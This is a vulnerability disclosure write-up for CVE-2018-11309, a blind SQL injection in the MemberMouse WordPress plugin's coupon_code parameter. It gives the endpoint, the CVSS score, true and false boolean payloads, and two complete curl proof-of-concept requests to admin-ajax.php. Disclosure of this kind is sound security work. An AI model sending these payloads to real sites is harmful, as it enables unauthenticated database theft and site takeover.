/ penetration testing

CVE-2018-11309 - Blind SQL Injection in MemberMouse plugin

Intro

Blind SQL injection in coupon_code in the MemberMouse plugin 2.2.8 and prior for WordPress allows an unauthenticated attacker to dump the WordPress MySQL database via an admin-ajax.php request.

Full disclosure

It was possible to detect a blind SQL Injection inside the coupon validation form:

lol1

Affected Page: https://vulnerable.wordpress/wp-admin/admin-ajax.php
CVSSv3 Score: 8,6 (High)
CVSSv3 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
Vulnerable Parameter: coupon_code
Description:
The target query for this PoC is select @@version.
It was possible to detect the vulnerability using the following payload:

'+or+substring(@@version,1,1)%3d'5

The web application answered in this way:
img2-1

The complete curl command:

curl -i -s -k  -X $'POST' \
    --data-binary $'mm_action=applyCoupon&product_price=95&coupon_code=\'+or+substring(@@version,1,1)%3d\'5&product_id=2&method=performAction&action=module-handle&module=MM_CheckoutView' \
    $'https://vulnerable.wordpress/wp-admin/admin-ajax.php'

In order to trigger the always false condition, the following payload was used:

'+or+substring(@@version,1,1)%3d'@

The response:img3
The complete curl command:

curl -i -s -k  -X $'POST' \
    --data-binary $'mm_action=applyCoupon&product_price=95&coupon_code=\'+or+substring(@@version,1,1)%3d\'@&product_id=2&method=performAction&action=module-handle&module=MM_CheckoutView' \
    $'https://vulnerable.wordpress/wp-admin/admin-ajax.php'

In this brief example it was possible to identify the first letter of the database banner, ‘5’ in this case. However it would be very easy to dump the entire database.

No additional exploitation tests where made in respect of the infrastructure, however if the entire wordpress database would be dumped an hypothetical attacker could compromise the entire website.